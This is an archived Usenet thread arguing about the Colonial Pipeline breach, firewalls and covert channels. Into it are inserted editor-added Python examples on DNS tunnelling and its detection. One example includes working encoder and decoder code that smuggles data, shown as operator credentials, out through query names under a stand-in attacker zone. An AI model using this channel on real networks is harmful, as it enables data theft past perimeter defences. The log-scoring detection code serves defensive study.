> >> I guess the FBI and NSA should be hiring YOU -- as you seem
> >> to have all the answers! (they must just be a bunch of
> >> stupid bureaucrats, eh?)
> >
> > No, but I did work for another agency on this.
> And they've had no successful penetrations? Are they using
> YOUR naive recommendations? Have their adversaries failed
> to learn and adapt their processes after you left?

It was not my recommendations. It was group work in intrusion detection. I was just part of a team.

> [You should recommend them to the FBI and NSA to take on
> *their* responsibilities!]
>
> Imagine how many breaches happen every day that are hushed up
> (because the parties don't want the public to lose faith in them)
> and unreported. Wanna bet your local hospital has been victimized?
> Do you recall hearing about it on the local news??
>
> A friend was the safety officer at one of the local hospitals.
> I got a panicked call, one night, because someone had used
> his laptop and it was now locked-pending-ransomware. He
> had nothing of value on the laptop -- but, his reputation (job!)
> at stake (despite the fact that HE wasn't the one who
> had caused the infection) in that he'd allowed the laptop to
> leave his *personal* control. My job, clean off the laptop
> and make it look like the infection had never occurred.
>
> (which meant also scanning other media he had in his possession)
> >> You consistently seem to downplay risk -- in your code, in your
> >> analysis of security issues, etc. That's a bad attitude for
> >> any developer!
> >>
> >> "Don't worry, the condom won't break..."
> >>>> Security is hard. Just thinking you can slap some bandaid
> >>>> or "guard" on a system is blissful ignorance.
> >>>
> >>> That doesn't mean we just let it wide open, without blocking anything.
> >> Blocking is only effective if it *is* effective.
> >> If someone can subvert ANY protection mechanism,
> >> then the protection mechanism represents an expenditure
> >> of YOUR effort -- but with no *actual* results!
> >
> > It is effective. Most entities are just not putting enough effort in firewalling, until it's too late.
> Firewalls, by themselves, are largely useless. It's like putting
> two locks on your front door -- and forgetting that you also
> have windows and skylights, invite workmen into your home, etc.
>
> Did you remove all of the floppy disks, USB ports, CD/DVD drives
> and other mechanisms that can be used to *locally* inject software
> into a machine INSIDE the firewalled domain?

These would require local access to machines, which is easier to guard against.
> Have you put filters on all of your incoming mail traffic and WWW responses?
>
> Are you sure nothing is tunneling through your firewall on some
> benign but ubiquitous protocol (like DNS)?

Can you explain how this Domain Name Service (DNS) can hide the real IP?

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

https://www.novabbs.com/tech/article-flat.php?id=63418&group=sci.electronics.design#63418
From: blockedo...@foo.invalid (Don Y)
Newsgroups: sci.electronics.design
Subject: Re: Tech audit of Colonial Pipeline found ‘glaring’ problems
Date: Mon, 17 May 2021 17:36:26 -0700
Organization: A noiseless patient Spider
Lines: 112
Message-ID: <s7v26n$5r8$1@dont-email.me>
 by: Don Y - Tue, 18 May 2021 00:36 UTC

On 5/17/2021 5:22 PM, Ed Lee wrote:
> On Monday, May 17, 2021 at 5:02:00 PM UTC-7, Don Y wrote:
>> On 5/17/2021 4:39 PM, Ed Lee wrote:
>>> On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:

>>> Confiscating Mary's PC broke the chain. Whether they catch Tom or not, there is no more damage.
>> No, it didn't. Betty's computer is ready to step in and assume
>> the role -- the pipeline is under the hacker's control so THEY
>> decide how that control is implemented. All you can do is
>> cut your connection to the outside world. In which case,
>> the hackers have achieved their goal and can wait for you
>> to try to bring things back on-line.
>
> The important point is blocking access with firewall before they get access through Mary, Betty and Tom.

Your initial claim was to block Russian and Chinese IPs. I
proposed a method by which Russian/Chinese-based hackers could
compromise a computer located WITHIN *your* claimed protection
domain ("The US").

Make that as small as you want and the attack still succeeds;
it just means the attacker has to target a smaller set of "allowed
hosts" (like John, Head of Pipeline Operations)

Hey, maybe you can block John, too! (then what value to remote access?)

>>>> Ask yourself how many happen every day that go unreported
>>>> (to the authorities OR the public). Lots of perps running
>>>> around, free to ply their wares on the next mark!
>>>>>> You can limit maintenance activities to OUTBOUND connections
>>>>>> (i.e., have the kit contact a "known" computer). But, would
>>>>>> have to hardwire an IP address to avoid DNS cache poisoning
>>>>>> effects. And, a dedicated hacker could still locate a device
>>>>>> "somewhere" that convinces the routers involved that *it*
>>>>>> is the legitimate hardwired IP address.
>>>>>>
>>>>>> (you *did* note the pwn plug reference I made, earlier?
>>>>>> Imagine *it* was sitting on John, Head of Pipeline Operations'
>>>>>> computer. *It* would appear to be the legitimate target of any
>>>>>> maintenance transactions if it filtered traffic to John's
>>>>>> *real* PC)
>>>>>
>>>>> Port scanning, intrusion and proxy take days. The authority would have
>>>>> time to shutdown John's PC, if it's in the US.
>>>> You're assuming they KNOW it's John's PC -- in short order.
>>>>
>>>> And, you're assuming that there is only one attack vector.
>>>>
>>>> You just keep painting yourself into a smaller corner
>>>> each time you HOPE some of these tactics yield results.
>>>>
>>>> I guess the FBI and NSA should be hiring YOU -- as you seem
>>>> to have all the answers! (they must just be a bunch of
>>>> stupid bureaucrats, eh?)
>>>
>>> No, but I did work for another agency on this.
>> And they've had no successful penetrations? Are they using
>> YOUR naive recommendations? Have their adversaries failed
>> to learn and adapt their processes after you left?
>
> It was not my recommendations. It was group work in intrusion detection. I was just part of a team.

And how successful are those techniques, *today*?

>> [You should recommend them to the FBI and NSA to take on
>> *their* responsibilities!]
>> Did you remove all of the floppy disks, USB ports, CD/DVD drives
>> and other mechanisms that can be used to *locally* inject software
>> into a machine INSIDE the firewalled domain?
>
> These would require local accesses to machines, which are easier to guard against.

Did you read the PwnPlug article? Did you note how the Bank Officials
WELCOMED the guy onto their premises who placed the device?

How many people wander around your average business in the course
of performing their normal duties? Plumbers, carpenters, electricians,
etc. They don't have to KNOW how to use a device to be exploited in
*placing* the device: "Here's $500 if you will put this device
in an out of the way location at company X"

Did you recall hearing accounts of US citizens who'd been paid to
set up domestic accounts that were actually foreign controlled?
Do you think they understood the consequences of their actions?
Do you think they would have refused the monies offered had they
understood (or, would they just have insisted on MORE)?

>> Have you put filters on all of your incoming mail traffic and WWW responses?
>>
>> Are you sure nothing is tunneling through your firewall on some
>> benign but ubiquitous protocol (like DNS)?
>
> Can you explain how this Domain Name Service (DNS) can hide the real IP?

You use a tunneling protocol to pass *information* out of (and into)
a firewalled domain. You're still looking for the perp instead
of focusing on the damage he's doing!

I can put a device inside a protection domain and have it communicate
with an outside agent without drawing attention to the fact that it
is doing so. The outside agency can similarly return command and
control information to that device using that -- or other -- protocols.

Lock down DNS and I'll piggyback under HTTP. Or SMTP/POPD. Or
I'll post coded instructions on a bogus facebook page (that your
IT department will allow to be viewed simply because your
employees visit other facebook pages as part of their "internet
access perk")

Your firewall has to be porous for you to conduct your business.
Because of that, there are always ways to sneak information
through it.
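
Worked example, added here by the editor and not code from any poster in this thread: the covert channel Don Y describes above in answer to Ed Lee's question ("how can DNS hide the real IP?") and in his earlier "Are you sure nothing is tunneling through your firewall on some benign but ubiquitous protocol (like DNS)?" The implant side chunks a payload into base32 labels of query names under a zone the attacker controls; the site's own resolver forwards those queries outward regardless of what the perimeter firewall blocks, because name resolution has to work for the business to work, and the attacker's authoritative server reads the labels back out. The second half scores a DNS query log for the shape that traffic has (many distinct names under one zone, long random-looking labels). The zone name cdn-metrics.example.net, the client addresses, the secret and the log lines are all constructed for the example, and the detection thresholds are assumptions to be tuned against your own baseline traffic.

```python
"""DNS tunnelling as a covert channel, plus a log-side check for it.

Added example, not code from the thread.  Domain names, hosts, secret
and log lines are constructed for the demonstration.
"""
from __future__ import annotations

import base64
import math
import re
from collections import defaultdict

# Zone the attacker controls (assumed).  The internal resolver forwards
# queries for names under it to the attacker's authoritative server, so
# every label the implant puts in a query name is delivered outbound.
TUNNEL_DOMAIN = "cdn-metrics.example.net"
MAX_LABEL = 50          # stays under the 63-octet DNS label limit


def encode_queries(payload: bytes, domain: str = TUNNEL_DOMAIN) -> list[str]:
    """Implant side: split payload into names <seq>.<base32 chunk>.<domain>."""
    b32 = base64.b32encode(payload).decode().rstrip("=").lower()
    chunks = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    return [f"{seq}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]


def decode_queries(names: list[str], domain: str = TUNNEL_DOMAIN) -> bytes:
    """Authoritative-server side: reassemble the payload from query names."""
    suffix = "." + domain
    pieces: dict[int, str] = {}
    for name in names:
        if name.endswith(suffix):
            seq, chunk = name[:-len(suffix)].split(".", 1)
            pieces[int(seq)] = chunk           # sequence label restores order
    b32 = "".join(pieces[i] for i in sorted(pieces)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))   # restore padding


# Detection: constructed log format "<timestamp> <client> query <type> <name>"
LOG_RE = re.compile(r"^(\S+) (\S+) query (\S+) (\S+)$")


def shannon_entropy(s: str) -> float:
    """Bits per character; base32 payload labels run far above hostnames."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def zone_of(name: str) -> str:
    """Crude registrable-domain guess (last two labels); enough for the demo."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def score_dns_log(lines, min_names=20, label_len=30, entropy_bits=3.5):
    """Return {zone: [reasons]} for zones whose queries look like a tunnel.

    Three signals: many distinct names under one zone, long leftmost
    labels, high per-label entropy.  Two must fire before a zone is
    reported, since CDNs and AV vendors legitimately trip single ones.
    Thresholds are assumptions to tune against your own baseline.
    """
    per_zone: dict[str, set[str]] = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            per_zone[zone_of(m.group(4))].add(m.group(4))

    findings = {}
    for zone, names in per_zone.items():
        longest = [max(n.split("."), key=len) for n in names]
        avg_len = sum(map(len, longest)) / len(longest)
        avg_ent = sum(map(shannon_entropy, longest)) / len(longest)
        reasons = []
        if len(names) >= min_names:
            reasons.append(f"{len(names)} distinct names")
        if avg_len >= label_len:
            reasons.append(f"avg longest label {avg_len:.0f} chars")
        if avg_ent >= entropy_bits:
            reasons.append(f"avg label entropy {avg_ent:.2f} bits")
        if len(reasons) >= 2:
            findings[zone] = reasons
    return findings


def sample_log() -> list[str]:
    """Constructed log: routine lookups plus one host exfiltrating a file."""
    benign = ["www.example.com", "mail.example.com", "login.example.com",
              "time.example.org", "updates.example.org"]
    lines = [f"2021-05-17T23:44:{i:02d}Z 10.0.0.{i % 7 + 2} query A {n}"
             for i, n in enumerate(benign * 4)]
    secret = b"scada operator creds (constructed): op1 / hunter2\n" * 25
    for i, q in enumerate(encode_queries(secret)):
        lines.append(f"2021-05-17T23:45:{i % 60:02d}Z 10.0.0.9 query TXT {q}")
    return lines


if __name__ == "__main__":
    for zone, why in score_dns_log(sample_log()).items():
        print(zone, "->", "; ".join(why))
```

Running it prints the tunnel's zone with the reasons it tripped and nothing for the routine lookups. The point Don makes still stands: lock this down (block direct outbound DNS, alert on the shape above) and the same payload fits in HTTP paths, mail bodies or a social-media page, so the log check is a detection control, not a way to make the firewall non-porous.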

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

https://www.novabbs.com/tech/article-flat.php?id=63419&group=sci.electronics.design#63419
Newsgroups: sci.electronics.design
Date: Mon, 17 May 2021 17:50:36 -0700 (PDT)
Message-ID: <055a040e-028e-4963-b38d-9ae291845428n@googlegroups.com>
Subject: Re: Tech audit of Colonial Pipeline found ‘glaring’ problems
From: edward.m...@gmail.com (Ed Lee)
Injection-Date: Tue, 18 May 2021 00:50:37 +0000
Content-Type: text/plain; charset="UTF-8"
 by: Ed Lee - Tue, 18 May 2021 00:50 UTC

On Monday, May 17, 2021 at 5:36:47 PM UTC-7, Don Y wrote:
> On 5/17/2021 5:22 PM, Ed Lee wrote:
> > On Monday, May 17, 2021 at 5:02:00 PM UTC-7, Don Y wrote:
> >> On 5/17/2021 4:39 PM, Ed Lee wrote:
> >>> On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:
>
> >>> Confiscating Mary's PC broke the chain. Whether they catch Tom or not, there is no more damage.
> >> No, it didn't. Betty's computer is ready to step in and assume
> >> the role -- the pipeline is under the hacker's control so THEY
> >> decide how that control is implemented. All you can do is
> >> cut your connection to the outside world. In which case,
> >> the hackers have achieved their goal and can wait for you
> >> to try to bring things back on-line.
> >
> > The important point is blocking access with firewall before they get access through Mary, Betty and Tom.
> Your initial claim was to block russian and chinese IPs. I
> proposed a method by which russian/chinese-based hackers could
> compromise a computer located WITHIN *your* claimed protection
> domain ("The US").
>
> Make that as small as you want and the attack still succeeds;
> it just means the attacker has to target a smaller set of "allowed
> hosts" (like John, Head of Pipeline Operations)
>
> Hey, maybe you can block John, too! (then what value to remote access?)

They don't have to block John, but he will be the first to be visited by authority.

> >>>> Ask yourself how many happen every day that go unreported
> >>>> (to the authorities OR the public). Lots of perps running
> >>>> around, free to ply their wares on the next mark!
> >>>>>> You can limit maintenance activities to OUTBOUND connections
> >>>>>> (i.e., have the kit contact a "known" computer). But, would
> >>>>>> have to hardwire an IP address to avoid DNS cache poisoning
> >>>>>> effects. And, a dedicated hacker could still locate a device
> >>>>>> "somewhere" that convinces the routers involved that *it*
> >>>>>> is the legitimate hardwired IP address.
> >>>>>>
> >>>>>> (you *did* note the pwn plug reference I made, earlier?
> >>>>>> Imagine *it* was sitting on John, Head of Pipeline Operations'
> >>>>>> computer. *It* would appear to be the legitimate target of any
> >>>>>> maintenance transactions if it filtered traffic to John's
> >>>>>> *real* PC)
> >>>>>
> >>>>> Port scanning, intrusion and proxy take days. The authority would have
> >>>>> time to shutdown John's PC, if it's in the US.
> >>>> You're assuming they KNOW it's John's PC -- in short order.
> >>>>
> >>>> And, you're assuming that there is only one attack vector.
> >>>>
> >>>> You just keep painting yourself into a smaller corner
> >>>> each time you HOPE some of these tactics yields results.
> >>>>
> >>>> I guess the FBI and NSA should be hiring YOU -- as you seem
> >>>> to have all the answers! (they must just be a bunch of
> >>>> stupid bureaucrats, eh?)
> >>>
> >>> No, but i did work for another agency on this.
> >> And they've had no successful penetrations? Are they using
> >> YOUR naive recommendations? Have their adversaries failed
> >> to learn and adapt their processes after you left?
> >
> > It was not my recommendations. It was group work in intrusion detection. I was just part of a team.
> And how successful are those techniques, *today*?
> >> [You should recommend them to the FBI and NSA to take on
> >> *their* responsibilities!]
> >> Did you remove all of the floppy disks, USB ports, CD/DVD drives
> >> and other mechanisms that can be used to *locally* inject software
> >> into a machine INSIDE the firewalled domain?
> >
> > These would require local accesses to machines, which are easier to guard against.
> Did you read the PwnPlug article? Did you note how the Bank Officials
> WELCOMED the guy onto their premises who placed the device?
>
> How many people wander around your average business in the course
> of performing their normal duties? Plumbers, carpenters, electricians,
> etc. They don't have to KNOW how to use a device to be exploited in
> *placing* the device: "Here's $500 if you will put this device
> in an out of the way location at company X"
>
> Did you recall hearing accounts of US citizens who'd been paid to
> set up domestic accounts that were actually foreign controlled?
> Do you think they understood the consequences of their actions?
> Do you think they would have refused the monies offered had they
> understood (or, would they just have insisted on MORE)?
> >> Have you put filters on all of your incoming mail traffic and WWW responses?
> >>
> >> Are you sure nothing is tunneling through your firewall on some
> >> benign but ubiquitous protocol (like DNS)?
> >
> > Can you explain how this Domain Name Service (DNS) can hide the real IP?
> You use a tunneling protocol to pass *information* out of (and into)
> a firewalled domain. You're still looking for the perp instead
> of focusing on the damage he's doing!
>
> I can put a device inside a protection domain and have it communicate
> with an outside agent without drawing attention to the fact that it
> is doing so. The outside agency can similarly return command and
> control information to that device using that -- or other -- protocols.

As long as your protected domain is in your local ISP. They can track and trace it.

> Lock down DNS and I'll piggyback under HTTP. Or SMTP/POPD. Or
> I'll post coded instructions on a bogus facebook page (that your
> IT department will allow to be viewed simply because your
> employees visit other facebook pages as part of their "internet
> access perk")

So, you are talking about name translations into IPs? Any serious mission critical op would disable these unsecure ports and do reverse IP lookup to verify its identity.

>
> Your firewall has to be porous for you to conduct your business.
> Because of that, there are always ways to sneak information
> through it.

You don't need to have mission critical machines serving mail and web pages, although they are often doing so.

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

<s7v4og$3mg$1@dont-email.me>


https://www.novabbs.com/tech/article-flat.php?id=63420&group=sci.electronics.design#63420

Path: i2pn2.org!i2pn.org!eternal-september.org!reader02.eternal-september.org!.POSTED!not-for-mail
From: blockedo...@foo.invalid (Don Y)
Newsgroups: sci.electronics.design
Subject: Re: Tech audit of Colonial Pipeline found ‘glaring’ problems
Date: Mon, 17 May 2021 18:20:05 -0700
Organization: A noiseless patient Spider
Lines: 143
Message-ID: <s7v4og$3mg$1@dont-email.me>
References: <899b7861-8d9a-445b-b583-7b99e3d69260n@googlegroups.com>
<7dfae847-1440-497a-abe3-5a42b5ae3a19n@googlegroups.com>
<553f9b17-6a07-4500-a6fe-a08373099606n@googlegroups.com>
<16f6ae28-f9dd-4330-b122-88cf5cb169aan@googlegroups.com>
<50d677b8-5221-44b7-8019-0f94d61e3e19n@googlegroups.com>
<dc33d98b-81b8-4abb-9d37-126ad8c93c04n@googlegroups.com>
<s7uh09$1q7$1@dont-email.me>
<61d05632-91bc-435f-8389-2b2d3aea7818n@googlegroups.com>
<s7uhqb$8ah$1@dont-email.me>
<df66e72e-7295-427d-8a5f-3e9bdd7e9653n@googlegroups.com>
<86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>
<s7upvk$2bp$1@dont-email.me>
<013c6a99-3dab-4650-8945-8485943a2283n@googlegroups.com>
<s7uu7j$alu$1@dont-email.me>
<b04a1b36-f089-4bb2-836f-5aced79d795en@googlegroups.com>
<s7v05i$c9r$1@dont-email.me>
<e8eff4a9-92c5-4a0c-8b0c-0b80ad4f775fn@googlegroups.com>
<s7v26n$5r8$1@dont-email.me>
<055a040e-028e-4963-b38d-9ae291845428n@googlegroups.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 7bit
Injection-Date: Tue, 18 May 2021 01:20:17 -0000 (UTC)
Injection-Info: reader02.eternal-september.org; posting-host="c5189e8a8f47664f33007e0ee6da7bd9";
logging-data="3792"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX18pqIUs4KXssG/1O3u0gl6A"
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101
Thunderbird/52.1.1
Cancel-Lock: sha1:9h+GbwXNgecbM9WMzPQbMxl5MTI=
In-Reply-To: <055a040e-028e-4963-b38d-9ae291845428n@googlegroups.com>
Content-Language: en-US
 by: Don Y - Tue, 18 May 2021 01:20 UTC

On 5/17/2021 5:50 PM, Ed Lee wrote:
> On Monday, May 17, 2021 at 5:36:47 PM UTC-7, Don Y wrote:
>> On 5/17/2021 5:22 PM, Ed Lee wrote:
>>> On Monday, May 17, 2021 at 5:02:00 PM UTC-7, Don Y wrote:
>>>> On 5/17/2021 4:39 PM, Ed Lee wrote:
>>>>> On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:
>>
>>>>> Confiscating Mary's PC broke the chain. Whether they catch Tom or
>>>>> not, there is no more damage.
>>>> No, it didn't. Betty's computer is ready to step in and assume the
>>>> role -- the pipeline is under the hacker's control so THEY decide how
>>>> that control is implemented. All you can do is cut your connection to
>>>> the outside world. In which case, the hackers have achieved their goal
>>>> and can wait for you to try to bring things back on-line.
>>>
>>> The important point is blocking access with firewall before they get
>>> access through Mary, Betty and Tom.
>> Your initial claim was to block russian and chinese IPs. I proposed a
>> method by which russian/chinese-based hackers could compromise a computer
>> located WITHIN *your* claimed protection domain ("The US").
>>
>> Make that as small as you want and the attack still succeeds; it just
>> means the attacker has to target a smaller set of "allowed hosts" (like
>> John, Head of Pipeline Operations)
>>
>> Hey, maybe you can block John, too! (then what value to remote access?)
>
> They don't have to block John, but he will be the first to be visited by
> authority.

So what? He, who should be focused on fixing the breach, is now
dealing with authorities mucking around with his kit.

Once subverted, the targeted device could be pointed at some other
IP for C&C. Unless there is a persistent trace of the actions
that implemented this, on John's PC, the only way to know where
the new C&C is would be to deal with the actual hacked node(s).

So, John has just been inconvenienced and stepped over. The
hack continues.

>>>> [You should recommend them to the FBI and NSA to take on *their*
>>>> responsibilities!] Did you remove all of the floppy disks, USB ports,
>>>> CD/DVD drives and other mechanisms that can be used to *locally*
>>>> inject software into a machine INSIDE the firewalled domain?
>>>
>>> These would require local accesses to machines, which are easier to
>>> guard against.
>> Did you read the PwnPlug article? Did you note how the Bank Officials
>> WELCOMED the guy onto their premises who placed the device?
>>
>> How many people wander around your average business in the course of
>> performing their normal duties? Plumbers, carpenters, electricians, etc.
>> They don't have to KNOW how to use a device to be exploited in *placing*
>> the device: "Here's $500 if you will put this device in an out of the way
>> location at company X"
>>
>> Did you recall hearing accounts of US citizens who'd been paid to set up
>> domestic accounts that were actually foreign controlled? Do you think they
>> understood the consequences of their actions? Do you think they would have
>> refused the monies offered had they understood (or, would they just have
>> insisted on MORE)?
>>>> Have you put filters on all of your incoming mail traffic and WWW
>>>> responses?
>>>>
>>>> Are you sure nothing is tunneling through your firewall on some benign
>>>> but ubiquitous protocol (like DNS)?
>>>
>>> Can you explain how this Domain Name Service (DNS) can hide the real IP?
>> You use a tunneling protocol to pass *information* out of (and into) a
>> firewalled domain. You're still looking for the perp instead of focusing
>> on the damage he's doing!
>>
>> I can put a device inside a protection domain and have it communicate with
>> an outside agent without drawing attention to the fact that it is doing
>> so. The outside agency can similarly return command and control
>> information to that device using that -- or other -- protocols.
>
> As long as your protected domain is in your local ISP. They can track and
> trace it.

Again, so what? You know the first hop on the list of C&C devices
involved. Hey, it's Mary Smith, again! You're spending resources
trying to hold someone accountable instead of protecting the
asset.

Many of us had master keys at my school. No, we weren't SUPPOSED to have
them. But, they were often convenient; getting into labs that may have been
locked down after hours, etc.

They were grudgingly tolerated -- it costs a small fortune to rekey
thousands of mechanical locks. And, with a student body consisting
*entirely* of engineer-wannabes, how long do you think it would take before
a NEW master key would surface??

The culture that developed was simple and practical. "Don't do anything
that will make us WANT to find you!" And, on the other side, "Don't
carry a master key in a readily discoverable location on your person"
(possession was /prima facie/ grounds for expulsion)

The idea of physically searching every student in the hope of
finding someone foolish enough to have one on their person was
an overhead that would likely yield NO results. The idea of
catching someone in the act of using one was similarly unproductive
(too much real estate to cover and surveillance cameras weren't
commonplace)

Instead, the threat of being expelled (prestigious school) kept
folks honest. It didn't do away with master keys -- just the
undesirable uses of them! Much lower "costs" and focused on
protecting assets, instead of hunting down perps.

>> Lock down DNS and I'll piggyback under HTTP. Or SMTP/POPD. Or I'll post
>> coded instructions on a bogus facebook page (that your IT department will
>> allow to be viewed simply because your employees visit other facebook
>> pages as part of their "internet access perk")
>
> So, you are talking about name translations into IPs? Any serious mission
> critical op would disable these unsecure ports and do reverse IP lookup to
> verify its identity.

DNS has legitimate use for a device inside a firewalled domain.
You can verify the identity -- and, if the targeted domain has
been hacked, what does that tell you about the actual hacker
who is leveraging their DNS domain? (nothing!)

Ever notice an FTP site set up in someplace "unexpected"?
And, likely not known by the hosting entity??

>> Your firewall has to be porous for you to conduct your business. Because
>> of that, there are always ways to sneak information through it.
>
> You don't need to have mission critical machines serving mail and web pages,
> although they are often doing so.

It doesn't have to be "mission critical". It just has to be a service that
can freely permeate the firewall. Because it experiences traffic "of that
sort" as a normal act of its operation.

If I see incoming traffic on port 53, I raise an eyebrow as my DNS is not
publicly accessible. But, I *expect* to see traffic on the ports exposed
by my web browser as I surf the net. Am I *sure* that all of that is
"as intended"?
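Don Y's point above is that a covert channel rides whatever the firewall has to let through, and that DNS is the usual candidate because every inside host needs it. The defender's answer is to look at the *shape* of the allowed traffic rather than its mere presence. The following is an added example (not code from any poster in this thread): it reads constructed resolver log lines in an assumed `<unix_ts> <client_ip> <qname> <qtype>` format and flags registered domains whose queries look like a tunnel (mostly-unique names, long high-entropy leftmost labels, heavy use of TXT/NULL records). The thresholds, the log format and the "last two labels" domain grouping are illustrative assumptions.

```python
"""Flag DNS query patterns that look like a covert channel riding port 53.

Added example for this thread, not code from any poster. Input is a
constructed resolver log ('<unix_ts> <client_ip> <qname> <qtype>');
thresholds are illustrative assumptions, not tuned values.
"""
import math
from collections import defaultdict

# Constructed sample: client .12 does ordinary lookups; client .77 sends
# long, high-entropy, never-repeated labels under one domain as TXT queries.
SAMPLE_LOG = """\
1621299037 10.0.0.12 www.example.com A
1621299038 10.0.0.12 mail.example.com MX
1621299040 10.0.0.12 cdn.example.net A
1621299041 10.0.0.12 www.example.com A
1621299042 10.0.0.77 a9f3k2m8q1z7x4c6v0b5n3.tunnel.example.org TXT
1621299043 10.0.0.77 q8w2e4r6t1y9u3i5o7p0a2.tunnel.example.org TXT
1621299044 10.0.0.77 z1x3c5v7b9n2m4k6j8h0g2.tunnel.example.org TXT
1621299045 10.0.0.77 l4k6j8h0g2f4d6s8a0p2o4.tunnel.example.org TXT
1621299046 10.0.0.77 m7n9b1v3c5x7z9a1s3d5f7.tunnel.example.org TXT
1621299048 10.0.0.12 www.example.com A
"""

RARE_QTYPES = {"TXT", "NULL"}  # record types ordinary clients seldom ask for
# Illustrative thresholds (assumptions): tune against your own baseline.
UNIQUE_RATIO, MEAN_ENTROPY, MEAN_LABEL_LEN, RARE_QTYPE_SHARE = 0.8, 3.0, 15, 0.5


def parse_log(text):
    """Parse log lines into dicts; malformed lines are skipped, not fatal."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, qname, qtype = parts
        records.append({"ts": int(ts), "client": client,
                        "qname": qname.rstrip(".").lower(),
                        "qtype": qtype.upper()})
    return records


def shannon_entropy(s):
    """Bits per character; 0.0 for an empty or single-symbol string."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Assumed simplification: the last two labels. A real deployment should
    use the Public Suffix List so names like foo.example.co.uk group right."""
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def leftmost_label(qname, domain):
    """The label furthest left of the registered domain ('' if none)."""
    if not qname.endswith("." + domain):
        return ""
    return qname[: -len(domain) - 1].split(".")[0]


def analyze(records, min_queries=3):
    """Per-domain statistics plus the list of tunnel indicators that fired."""
    groups = defaultdict(list)
    for r in records:
        groups[registered_domain(r["qname"])].append(r)
    stats = {}
    for domain, rs in groups.items():
        if len(rs) < min_queries:
            continue  # too few queries to judge either way
        n = len(rs)
        labels = [leftmost_label(r["qname"], domain) for r in rs]
        s = {
            "queries": n,
            "unique_ratio": len({r["qname"] for r in rs}) / n,
            "mean_entropy": sum(shannon_entropy(l) for l in labels) / n,
            "mean_label_len": sum(len(l) for l in labels) / n,
            "rare_qtype_share": sum(r["qtype"] in RARE_QTYPES for r in rs) / n,
        }
        s["indicators"] = [name for name, hit in (
            ("mostly-unique names", s["unique_ratio"] >= UNIQUE_RATIO),
            ("high-entropy labels", s["mean_entropy"] >= MEAN_ENTROPY),
            ("long labels", s["mean_label_len"] >= MEAN_LABEL_LEN),
            ("rare record types", s["rare_qtype_share"] >= RARE_QTYPE_SHARE),
        ) if hit]
        stats[domain] = s
    return stats


def suspicious_domains(text, min_indicators=2):
    """Domains where at least min_indicators heuristics agree, sorted."""
    stats = analyze(parse_log(text))
    return sorted(d for d, s in stats.items()
                  if len(s["indicators"]) >= min_indicators)


if __name__ == "__main__":
    for domain, s in analyze(parse_log(SAMPLE_LOG)).items():
        print(f"{domain}: {s['queries']} queries, indicators {s['indicators']}")
    print("suspicious:", suspicious_domains(SAMPLE_LOG))
```

On the sample, `example.com` fires no indicator and `example.org` fires all four; `example.net` is not judged at all because one query is too little data. Requiring two independent indicators to agree is what keeps a CDN with many hashed hostnames, or a legitimate TXT-heavy mail domain, from being flagged on one feature alone. None of this identifies the hacker, which is exactly the point made above: it tells you the channel exists, so you can cut it, without needing to know who is on the far end.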

Re: Tech audit of Colonial Pipeline found ?glaring? problems

<60a37c28$0$29342$e4fe514c@news.xs4all.nl>


https://www.novabbs.com/tech/article-flat.php?id=63421&group=sci.electronics.design#63421

Path: i2pn2.org!i2pn.org!aioe.org!news.uzoreto.com!newsfeed.xs4all.nl!newsfeed8.news.xs4all.nl!nzpost1.xs4all.net!not-for-mail
Newsgroups: sci.electronics.design
Subject: Re: Tech audit of Colonial Pipeline found ?glaring? problems
References: <899b7861-8d9a-445b-b583-7b99e3d69260n@googlegroups.com> <df66e72e-7295-427d-8a5f-3e9bdd7e9653n@googlegroups.com> <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com> <MPG.3b0cb399adffcb3d9897af@news.eternal-september.org>
X-Newsreader: trn 4.0-test77 (Sep 1, 2010)
From: alb...@cherry (none)
Originator: albert@cherry.(none) (albert)
Date: 18 May 2021 08:34:48 GMT
Lines: 29
Message-ID: <60a37c28$0$29342$e4fe514c@news.xs4all.nl>
NNTP-Posting-Host: ab32fe85.news.xs4all.nl
X-Trace: G=2iQw2uwH,C=U2FsdGVkX18KuDqn5Ct/ygrx/m6LIk83vHRGeQKaS4P2+OriDmtU4Ty6OE4u1oN8x52ogJNjMz6gIqCMvxT8dAfuUfpU1jE4thXw3V4+22wnOohoKBURJ1tKlAARH9Hh
X-Complaints-To: abuse@xs4all.nl
 by: none - Tue, 18 May 2021 08:34 UTC

In article <MPG.3b0cb399adffcb3d9897af@news.eternal-september.org>,
Ralph Mowery <rmowery42@charter.net> wrote:
>In article <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>,
>edward.ming.lee@gmail.com says...
>>
>> > The silly part is guessing as to what was wrong and then speculating on how to fix it.
>>
>> The wrong thing was having foreign access to mission critical computers.
>>
>>
>
>The real wrong thing is to put anything on the internet where it can be
>accessed. While even a hard wired setup can be hacked, it would be much
>more difficult.

I worked with the Netherlands tax office. They had a country wide net
totally separate from the Internet. If I wanted to google something, I
had to go to the internet computer in a different room. Of course most
plants have not even a need for a country wide net.

Groetjes Albert

>
>
--
"in our communism country Viet Nam, people are forced to be
alive and in the western country like US, people are free to
die from Covid 19 lol" duc ha
